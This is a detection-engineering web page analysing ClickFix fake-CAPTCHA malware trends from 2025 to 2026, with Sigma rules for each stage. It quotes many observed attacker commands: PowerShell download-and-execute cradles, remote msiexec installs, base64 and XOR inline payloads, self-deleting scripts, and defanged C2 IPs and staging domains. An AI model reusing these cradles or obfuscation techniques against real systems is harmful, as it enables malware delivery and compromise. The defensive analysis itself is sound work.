Detection Chokepoints
  • Chokepoints
  • Attack Chains
  • Trends
    • ClickFix Delivery
    • Edge Exploits
    • Masq Infra
  • Framework
  • Contribute
Detection Chokepoints
Chokepoints Attack Chains
ClickFix Delivery Edge Exploits Masq Infra
Framework Contribute↗
  • Overview
  • Framework
  • Volume
  • Cradles
  • Evasion
  • MSIExec
  • Inline
  • Staging
  • Detections

ClickFix Delivery Chain: Trend Analysis

Data: MHaggis ClickGrab + ClickFix Hunter  ·  Period: Aug 2025 – May 2026  ·  534 nightly reports + 3321 domains  ·  Generated: 2026-06-29

3321
ClickFix domains
25k+
Sites crawled
1054
MSIExec deliveries
1056
Inline payloads (no URL)
454
Base64 encoded
340
Hex-XOR payloads

Detection Chokepoint Framework

Every ClickFix variant (ClickFix, FileFix, TerminalFix, InstallFix) follows these five stages. The lure changes. The clipboard command changes. The delivery method changes. But the chain doesn't. Each badge maps to the ATT&CK technique you're actually detecting at that stage.

Browser renders lure Fake CAPTCHA / reCAPTCHA page LURE DELIVERY
›
JS → clipboard execCommand("copy") writes cmd CLIPBOARD WRITE
›
Process spawn Run dialog → cmd.exe → PowerShell T1059 EXECUTION
›
Network fetch IWR / IRM / WebClient / Curl T1105 INGRESS TOOL
›
Payload write Script dropped to %TEMP% T1204 USER EXEC
›
Execute + cleanup Payload runs, then self-deletes T1070 CLEANUP

Two behaviors survive every variant rotation: the process spawn (T1059) and the network fetch (T1105). The user opens Run, pastes, hits Enter. That parent→child process relationship is baked into the attack primitive. And until recently, every cradle had to reach out to a staging URL to pull the payload. That's where your detection bets pay off. We'll get to why "until recently" matters below. Full detection logic is on the ClickFix Techniques chokepoint page.

Monthly Volume: Malicious Domain Count

Unique malicious ClickFix domains observed per month from the domain dataset. Volume spikes correlate with specific campaigns. The Nov 2025 surge was driven by the shift-art[.]com MSIExec campaign (669 domains).

Malicious ClickFix domains by month
May 2026: 92.4% of domains now carry inline payloads. Up from 65% in April and 40% in March, the no-URL rate has hit a new high. Base64 accounts for 67% of May domains (354/528). A new delivery variant also appeared: conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate" mounts a WebDAV share and launches a binary impersonating Google Update - no PowerShell, no HTTP fetch, no URL in the clipboard command at all. Your T1105 network-fetch detection never fires. The behavioral chokepoint that does fire: unusual parent process spawning conhost.exe or cmd.exe with a UNC path argument.

T1105 Ingress Tool Transfer: Cradle Family Evolution

The network fetch was the unavoidable action. This chart shows how adversaries rotated their download method as defenders tuned IWR/IEX-specific detections, and why that rotation actually validates the chokepoint approach.

Monthly cradle family distribution (PowerShell download method)
Dec 2025 pivot: your IWR detections worked. IWR/IEX drops sharply as WebClient and Curl surge in the same month. That's not coincidence. That's adversaries responding to detection pressure. If you were pattern-matching on iwr|Invoke-WebRequest, congratulations: you forced a rotation. But if that's all you were matching, your coverage just dropped to near-zero.
Mar 2026: IWR came back. After nearly disappearing in Dec–Jan, IWR surged to 27.7% in March. A verifyhumanbot[.]com / SafeAntiBotsNet campaign brought it right back. This is the whole point: cradle rotation is cyclical, not one-directional. The adversary who abandoned IWR in December picked it back up in March because defensive attention had shifted elsewhere. If you built behavioral rules (unusual parent → PowerShell → outbound fetch), you caught it both times. If you built string-match rules, you caught it, lost it, and caught it again, assuming you didn't delete the "obsolete" detection.
The chokepoint didn't move. IWR → WebClient → Curl → IWR again. The download method rotated three times in six months. The detection signal didn't change once: PowerShell process spawned by an unusual parent (explorer.exe, cmd.exe from Run dialog) making an outbound HTTP connection. That's the difference between detecting the tool and detecting the behavior.

Evasion Technique Trends: Where Adversaries Are Adapting

Think of this chart as a conversation between attackers and defenders. Rising lines = defenders forced a change. Flat lines with spikes = a specific campaign tried something, then moved on. The trends tell you which evasion techniques are gaining traction and which were one-off experiments.

Monthly evasion technique prevalence (count of sites using each technique)
Self-delete was a burst, not a trend. 27.4% in Dec → 2.3% Jan → 0% by April. One campaign tried it, others didn't pick it up. It's in the toolkit but it's not the future. If you built file-write-then-delete correlation rules in December, keep them, but the bigger threat is below.
The May base64 spike was one campaign, not a re-tooling. Hex-XOR (-bxor) is the persistent inline encoder of spring 2026: absent before March, then 16% of March domains, 54% in April (97/181), 22% in May, and back to 84% in June (62/74). Base64 stayed in the single digits (9% March, 8% April) until May, when it spiked to 67% (354/528) almost entirely on one token (frombase64string, 352 of 354) before collapsing to 1% in June. The two encoders barely overlap (2 of May's 354 base64 domains also use hex-XOR), so this reads as a single base64 campaign cluster passing through, not a durable shift. Either way, if your rules match plaintext iwr https:// strings you're seeing the encoded version now, not the decoded cradle. Detect the encoding act, not the encoder: [Convert]::FromBase64String piped to iex, the -bxor decode loop, or -enc from an unusual parent. The content is opaque; the execution context isn't.
Mixed-case is dead. POWerShEll, PowErsHeLL: peaked mid-2025, trending to zero. Base64 replaced it as the primary obfuscation. If you shipped case-insensitive regex in 2025, you caught the tail end of a dying technique. Not wasted effort, but not where the action is anymore.

New Cradle Family: MSIExec Package Installation

In November 2025, the ClickFix chokepoint shifted underneath the detection layer. 87% of domains rotated from PowerShell cradles to msiexec /i. Same social engineering invariant, completely different execution chain. MSIExec delivery peaked at 669/767 domains before declining through Q1 2026. The technique shift demonstrates why chokepoint-anchored detection matters: PowerShell-specific rules missed the rotation entirely, but detections built around the clipboard-to-execution invariant still caught the handoff.

The shift-art[.]com campaign drove the surge: 651 domains using fake Cloudflare verification paths. The URL structure alone is worth a detection:

msiexec /i hxxps[://]shift-art[.]com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
Same chokepoint, different binary. msiexec.exe spawning from cmd.exe or Run dialog, fetching an MSI from a non-enterprise URL. That's the same parent→child process execution chokepoint (T1059/T1218) as the PowerShell cradles. The invariant is the process relationship, not the binary name. Oct 18% → Nov 87% → Dec 34% → Jan 24% → Feb 29% → Mar 2%.

WScript/VBS: A Failed Diversification (Dec 2025 – Feb 2026)

Adversaries also tried VBS in the same diversification window. Dec 2025 (21.9%), peaked Jan (46.3%), dead by March (0%). Used CreateObject("WinHttp.WinHttpRequest.5.1") to fetch payloads via WScript. Abandoned fast. EDR catches WScript execution reliably, so this branch got pruned while WebClient and Curl survived. Not every experiment sticks.

Strategic Shift: Inline Payloads Bypassing Network Fetch Detection

Here's the finding that changes the detection calculus: 92% of May 2026 domains have no URL in the clipboard command at all. Up from 28% in August. The payload is entirely inline. The user pastes everything needed, and nothing reaches out to a staging server. Your network-fetch detection? It never fires.

Base64 accounted for 67% of May domains (354/528), but that was a single-campaign spike (see above) - by June it collapsed to 1% while hex XOR ($k/$d variable patterns with -bxor decoding, 65 instances in March) climbed back to 84%. A newer WebDAV delivery variant also appears, using conhost --headless cmd /c "pushd \\IP@port\DavWWWRoot && start GoogleUpdate" - no PowerShell, no HTTP, nothing to intercept at the network layer. The social engineering does double duty. Fake CAPTCHA comments inside the payload reinforce the lure:

powershell -w hidden <# I am not a robot - Cloudflare ID: 8e3f2a #> $k='xK9mP2';$d='4a5b6c...';
$b=[byte[]]@();for($i=0;$i-lt$d.Length;$i+=2){$b+=[byte]("0x"+$d.Substring($i,2))-bxor[byte]$k[$i%$k.Length]};
iex([Text.Encoding]::UTF8.GetString($b))
Your network-fetch detection covers 8% of the threat now. 92% of May 2026 domains skip the remote fetch entirely. You need a parallel detection for the decode-and-execute pattern: unusual parent → PowerShell with -enc, -bxor operations, or [Convert]::FromBase64String piped to iex. Neither detection alone is sufficient anymore. Run both. And if you're not alerting on conhost --headless spawning cmd.exe with a UNC path argument, you have a blind spot for the WebDAV variant entirely.

Monthly no-URL trend: Aug 28% → Sep 29% → Oct 32% → Nov 5% → Dec 7% → Jan 16% → Feb 6% → Mar 40% → Apr 65% → May 92% → Jun 88%.

Port 5506 C2 Infrastructure Cluster

333 domains call back to port 5506 across 14 IPs in a few /24 ranges. One operator, one port, zero legitimate services using 5506. This is the kind of infrastructure fingerprint that makes network detection easy.

Any outbound connection to port 5506 from a workstation is suspicious. Port 5506 is not used by any common legitimate service. Top nodes: 198[.]13[.]158[.]127:5506 (186 domains), 178[.]17[.]59[.]40:5506 (64), 78[.]40[.]209[.]164:5506 (40).

Staging Infrastructure

Where the payloads actually live. CDN-hosted staging defeats domain-reputation blocking because the infrastructure is legitimate web hosting. You can't blocklist raw.githubusercontent.com without breaking your developers' workflows. Detection has to be contextual. A network appliance fetching a shell script from GitHub and piping it to bash is anomalous regardless of the domain.

Domain / IP Payloads Type Blind spot
irp[.]cdn-website[.]com 468 CDN Domain reputation blocklists ineffective (legitimate CDN provider)
ASN AS16509 Amazon.com, Inc.
Country / City United States · Aetna Estates
Hosting CDN Legitimate content delivery network
Registered -
Status Active
DNS history SecurityTrails →
yogasitesdev[.]wpengine[.]com 116 MGD -
ASN AS396982 Google LLC
Country / City United States · North Charleston
Hosting Managed Managed hosting (likely compromised)
Registered -
Status Active
DNS history SecurityTrails →
aatox[.]com 83 BP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS16509 Amazon.com, Inc.
Country / City United States · Seattle
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Registered 2025-07-12
Registrar Namepanther.com LLC
Status Unknown
DNS history SecurityTrails →
80[.]253[.]249[.]186 43 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS213702 QWINS LTD
Country / City Germany · Frankfurt am Main
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Unknown
95[.]164[.]53[.]214 16 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS213702 QWINS LTD
Country / City Germany · Frankfurt am Main
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Unknown
91[.]247[.]36[.]3 4 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS59729 GREEN FLOID LLC
Country / City Bulgaria · Sofia
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Unknown
sitecariri[.]com[.]br 2 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS13335 Cloudflare, Inc.
Country / City United States · San Francisco
Hosting Compromised Legitimate site abused as staging host
Registered 2022-07-19
Status Unknown
DNS history SecurityTrails →
fundacion-cannabis-argentina[.]org 2 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS47583 Hostinger International Limited
Country / City United States · Phoenix
Hosting Compromised Legitimate site abused as staging host
Registered 2023-06-15
Registrar HOSTINGER operations, UAB
Status Unknown
DNS history SecurityTrails →
ghenvironment[.]com 2 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS13335 Cloudflare, Inc.
Country / City United States · San Francisco
Hosting Compromised Legitimate site abused as staging host
Registered 2022-03-04
Registrar Hosting Concepts B.V. d/b/a Registrar.eu
Status Unknown
DNS history SecurityTrails →
cmparazinho[.]rn[.]gov[.]br 2 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS47583 Hostinger International Limited
Country / City Brazil · São Paulo
Hosting Compromised Legitimate site abused as staging host
Registered 1996-10-15
Status Unknown
DNS history SecurityTrails →
shift-art[.]com 651 BP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS197695 Domain names registrar REG.RU, Ltd
Country / City Russia · Moscow
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Registered 2023-01-17
Registrar Registrar of Domain Names REG.RU LLC
Status Active
DNS history SecurityTrails →
ghost[.]nestdns[.]com 137 BP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS55293 A2 Hosting, Inc.
Country / City United States · Detroit
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Registered -
Status Active
DNS history SecurityTrails →
144[.]31[.]47[.]76 140 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS215439 PLAY2GO INTERNATIONAL LIMITED
Country / City Finland · Helsinki
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Active
inkbookwriters[.]com 112 BP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS207569 IHOR HOSTING LTD
Country / City Finland · Helsinki
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Registered 2025-09-22
Registrar Hosting Concepts B.V. d/b/a Registrar.eu
Status Active
DNS history SecurityTrails →
198[.]13[.]158[.]127[:]5506 186 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS399629 BL Networks
Country / City The Netherlands · Amsterdam
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Active
178[.]17[.]59[.]40[:]5506 64 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS213702 QWINS LTD
Country / City Poland · Warsaw
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Active
78[.]40[.]209[.]164[:]5506 40 IP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS213702 QWINS LTD
Country / City Finland · Helsinki
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Status Active
penguinpublishers[.]org 56 BP Abuse-tolerant VPS - takedown requests ignored; block by ASN or IP range
ASN AS207569 IHOR HOSTING LTD
Country / City Finland · Helsinki
Hosting Bulletproof Abuse-tolerant VPS / dedicated hosting
Registered 2025-03-05
Registrar Hosting Concepts B.V. d/b/a Registrar.eu
Status Unknown
DNS history SecurityTrails →
bfacollege[.]co[.]in 54 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS46606 Unified Layer
Country / City United States · Provo
Hosting Compromised Legitimate site abused as staging host
Registered 2019-07-08
Registrar Endurance International Group India Private Limited
Status Unknown
DNS history SecurityTrails →
pizzabyte[.]com[.]au 44 COMP Legitimate site used as payload host - blocking harms the victim domain
ASN AS30148 Sucuri
Country / City United States · Menifee
Hosting Compromised Legitimate site abused as staging host
Registered -
Registrar Synergy Wholesale Accreditations Pty Ltd
Status Unknown
DNS history SecurityTrails →
raw[.]githubusercontent[.]com 28 CDN Domain reputation blocklists ineffective (legitimate CDN provider)
ASN AS54113 Fastly, Inc.
Country / City United States · San Francisco
Hosting CDN Legitimate content delivery network
Registered -
Status Active
DNS history SecurityTrails →

Domain names and observation counts are from ClickGrab nightly reports. Hosting type is only classified when verifiable from the domain itself (e.g., *.cdn-website.com = CDN, *.wpengine.com = managed hosting). IP enrichment (ASN, geo, registrar) requires running the enrichment pipeline. Unverified entries show "Unknown."

CDN-hosted staging defeats domain blocking. irp.cdn-website.com appeared in 468 payload fetches. This is a legitimate CDN used by website builders. Blocking it would impact legitimate sites. Detection must shift to behavioral signals (PowerShell → network → unusual domain path) rather than domain-reputation lookup.

Detection Recommendations

Each recommendation maps to the ATT&CK technique it detects. The ones at the top survived every cradle rotation, every obfuscation pivot, and every infrastructure change in this dataset. The ones lower down are still valuable but more brittle.

T1059
Detect unusual parent → PowerShell spawn
Correlate explorer.exe or cmd.exe (from Run dialog) spawning powershell.exe with a window-hidden flag. This signal is constant regardless of cradle family rotation. See sigma-rules/clickfix/hunt.yml.
Observed payloads (2)
powershell.exe -w hidden -nop -ep bypass -c "iex(iwr 'hxxps://aatox[.]com/a.ps1' -UseBasicParsing)"
Observed: 2025-09-03
cmd.exe /c start /min powershell -w hidden -nop -c "(New-Object Net.WebClient).DownloadString('hxxps://95[.]164[.]53[.]214/b.ps1') | iex"
Observed: 2025-10-31
Example detection logic
title: Browser or Explorer Spawning Hidden PowerShell
logsource:
  category: process_creation
  product: windows
detection:
  selection_interp:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\mshta.exe'
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_hidden:
    CommandLine|contains:
      - '-W Hidden'
      - '-WindowStyle Hidden'
      - '-NoProfile'
  condition: selection_interp and selection_parent and selection_hidden
level: high
T1059
Cradle-agnostic network fetch detection
Move from IWR/IRM string matching to: PowerShell process → outbound HTTP/HTTPS to non-Microsoft, non-CDN domain → path ends in .ps1/.txt/.hta. This catches IWR, Curl, WebClient, and any future cradle. Update Sigma rules to use process+network correlation, not command-string pattern matching.
Observed payloads (7)
IWR / IEX
powershell -ep bypass -w hidden -c "iex(iwr 'hxxps://aatox[.]com/stage2.ps1' -UseBasicParsing)"
Observed: 2025-08-14
powershell.exe -w hidden -nop -c "IEX (iwr -Uri 'hxxps://irp[.]cdn-website[.]com/files/uploaded/3b7f1c/run.ps1' -UseBasicParsing).Content"
Observed: 2025-10-22
IRM / IEX
powershell -w hidden -nop -ep bypass -c "iex(irm 'hxxps://80[.]253[.]249[.]186/loader.ps1')"
Observed: 2025-05-03
WebClient
(New-Object Net.WebClient).DownloadString('hxxps://yogasitesdev[.]wpengine[.]com/wp-content/uploads/a.ps1') | iex
Observed: 2025-12-03
$wc=New-Object Net.WebClient; iex $wc.DownloadString('hxxps://irp[.]cdn-website[.]com/files/uploaded/9d4e/payload.ps1')
Observed: 2025-11-18
Curl
curl.exe -s hxxps://95[.]164[.]53[.]214/payload.ps1 | iex
Observed: 2026-01-08
powershell -w hidden -nop -c "curl.exe -UseBasicParsing hxxps://aatox[.]com/stg.ps1 | iex"
Observed: 2026-02-14
Example detection logic
title: PowerShell Outbound Fetch of Script Payload
logsource:
  category: network_connection
  product: windows
detection:
  selection_proc:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_outbound:
    Initiated: 'true'
    DestinationPort:
      - 80
      - 443
  filter_internal:
    DestinationIp|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  filter_ms:
    DestinationHostname|endswith:
      - '.microsoft.com'
      - '.windows.com'
      - '.azure.com'
  condition: selection_proc and selection_outbound and not (filter_internal or filter_ms)
level: high
# Pair with file_event rule matching *.ps1/*.txt/*.hta writes by the same ProcessGuid.
T1027
Detect Base64 decode + execute
[Convert]::FromBase64String or [Text.Encoding]::UTF8.GetString followed immediately by iex / Invoke-Expression. The encoding act itself is detectable even when the decoded content is not. Base64 jumped from 8.3% of domains in April 2026 to 67% in May 2026 (354/528) before receding in June.
Observed payloads (2)
Encoded command
powershell.exe -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAn...
Decoded
$c=New-Object Net.WebClient; iex $c.DownloadString('hxxps://aatox[.]com/run.ps1')
Observed: 2026-01-22
Encoded command
powershell -w 1 -nop -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMA...
Decoded
IEX(New-Object Net.WebClient).DownloadString('hxxps://irp[.]cdn-website[.]com/files/uploaded/7c2a/stage2.ps1')
Observed: 2026-02-01
Example detection logic
title: PowerShell Base64 Decode Piped to Invoke-Expression
logsource:
  category: process_creation
  product: windows
detection:
  selection_proc:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_decode_exec:
    CommandLine|contains|all:
      - 'FromBase64String'
      - 'iex'
  selection_enc:
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-e '
  condition: selection_proc and (selection_decode_exec or selection_enc)
level: high
T1070
File write → execute → delete correlation (new Dec 2025)
Self-delete appeared at scale in December 2025. Correlate: script written to %TEMP% → process execution from that path → file deletion within seconds. If artifact-based rules are your only coverage, they're now blind after execution completes. Use process execution telemetry, not file presence.
Observed payloads (2)
Start-Sleep -Seconds 2; Remove-Item -Path $MyInvocation.MyCommand.Path -Force
Observed: 2025-12-19
$p=$MyInvocation.MyCommand.Path; Start-Sleep 1; Remove-Item $p -Force -ErrorAction SilentlyContinue
Observed: 2026-01-05
Example detection logic
title: Script Self-Delete After Execution From TEMP
# Correlation: file_event (write) + process_creation + file_event (delete) on same ProcessGuid/TargetFilename within 10s.
logsource:
  product: windows
detection:
  file_write:
    EventID: 11          # Sysmon File Created
    TargetFilename|contains:
      - '\Temp\'
      - '\AppData\Local\Temp\'
    TargetFilename|endswith:
      - '.ps1'
      - '.bat'
      - '.vbs'
      - '.hta'
  process_exec:
    EventID: 1           # Sysmon Process Create
    Image: '%file_write.TargetFilename%'
  file_delete:
    EventID: 23          # Sysmon File Deleted
    TargetFilename: '%file_write.TargetFilename%'
  condition: file_write | followed_by process_exec | followed_by file_delete within 10s
level: high
INFRA
CDN staging: pivot from domain blocking to path-pattern detection
irp.cdn-website.com is a legitimate CDN. Block it and you break legitimate sites. Instead, alert on PowerShell fetching from *.cdn-website.com paths matching /files/uploaded/*.ps1. Or use JA4/TLS fingerprinting on the outbound connection rather than the destination hostname.
Observed staging URLs (2)
hxxps://irp[.]cdn-website[.]com/files/uploaded/38ef2b/setup.ps1
Observed: 2025-11-04
hxxps://irp[.]cdn-website[.]com/files/uploaded/9d4e22/loader.ps1
Observed: 2025-09-17
Example detection logic
title: PowerShell Fetching Script From CDN Uploads Path
# Path-based detection: keep the CDN reachable for legitimate use, catch the staging pattern.
logsource:
  category: proxy
detection:
  selection_client:
    c-useragent|contains:
      - 'WindowsPowerShell'
      - 'Microsoft.PowerShell'
  selection_host:
    r-dns|endswith: '.cdn-website.com'
  selection_path:
    cs-uri-path|contains: '/files/uploaded/'
    cs-uri-path|endswith:
      - '.ps1'
      - '.txt'
      - '.hta'
  condition: selection_client and selection_host and selection_path
level: high
T1218
Detect MSIExec fetching packages from non-enterprise URLs
msiexec.exe with /i http where the URL is not a known enterprise software source, spawned from cmd.exe or explorer.exe (Run dialog). Covers the 1,054-domain MSIExec delivery campaign that peaked at 87% in Nov 2025.
Observed payloads (3)
msiexec /i hxxps[://]shift-art[.]com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
Peak-campaign pattern. Long "verification" path, random CustomerID, cloudflare-themed lure.
msiexec /i hxxps[://]verifyhumanbot[.]com/pkg/update.msi /quiet /norestart
Silent install with /quiet /norestart. No prompts, no dialogs.
msiexec /i hxxp[://]198[.]13[.]158[.]127:5506/i.msi
Port-5506 direct-IP staging. Bypasses domain reputation. Raw IP + nonstandard port is the signal.
Example detection logic
title: MSIExec Installing Package From Remote URL via Run Dialog
logsource:
  category: process_creation
  product: windows
detection:
  selection_proc:
    Image|endswith: '\msiexec.exe'
  selection_remote:
    CommandLine|contains:
      - '/i http://'
      - '/i https://'
  selection_parent:
    ParentImage|endswith:
      - '\cmd.exe'
      - '\explorer.exe'
      - '\powershell.exe'
  filter_enterprise:
    CommandLine|contains:
      - 'microsoft.com'
      - 'windowsupdate.com'
      - 'office.com'
  condition: selection_proc and selection_remote and selection_parent and not filter_enterprise
level: high
T1059
Detect inline payload decode-and-execute
PowerShell with -enc flag or XOR decode operations (-bxor, [byte], [char]) spawned from unusual parent (Run dialog chain). Also: [Convert]::FromBase64String followed by iex. Covers the 28% → 92% growth in inline payloads that skip the network fetch entirely. Run alongside network-fetch detection. Both are needed for full coverage.
Observed payloads (3)
powershell -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGEAZAAuAGUAeABhAG0AcABsAGUALwBwAC4AcABzADEAIgApAA==
Classic -EncodedCommand dropper. Base64 decodes to an IEX + DownloadString cradle. The encoding is the signal, not the content.
powershell -c "$b=[Convert]::FromBase64String('...'); iex ([System.Text.Encoding]::UTF8.GetString($b))"
FromBase64String piped to iex inline. No network fetch. Entire payload ships in the clipboard paste.
powershell -c "$k=0x13; $e=@(0x42,0x17,0x26,...); -join($e|%{[char]($_ -bxor $k)})|iex"
XOR-decode loop. Single-byte key, byte array, -bxor reduction, piped to iex. Pure in-memory decode.
Example detection logic
title: PowerShell Inline Decode-and-Execute (No Network Fetch)
logsource:
  category: process_creation
  product: windows
detection:
  selection_proc:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_encoded:
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-e '
  selection_xor:
    CommandLine|contains|all:
      - '-bxor'
      - '[char]'
  selection_b64_iex:
    CommandLine|contains|all:
      - 'FromBase64String'
      - 'iex'
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\cmd.exe'
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  condition: selection_proc and selection_parent and (selection_encoded or selection_xor or selection_b64_iex)
level: high
# Run alongside the cradle-agnostic network fetch rule. Both are needed.
Detection Chokepoints - community detection engineering resource GitHub Contribute MITRE ATT&CK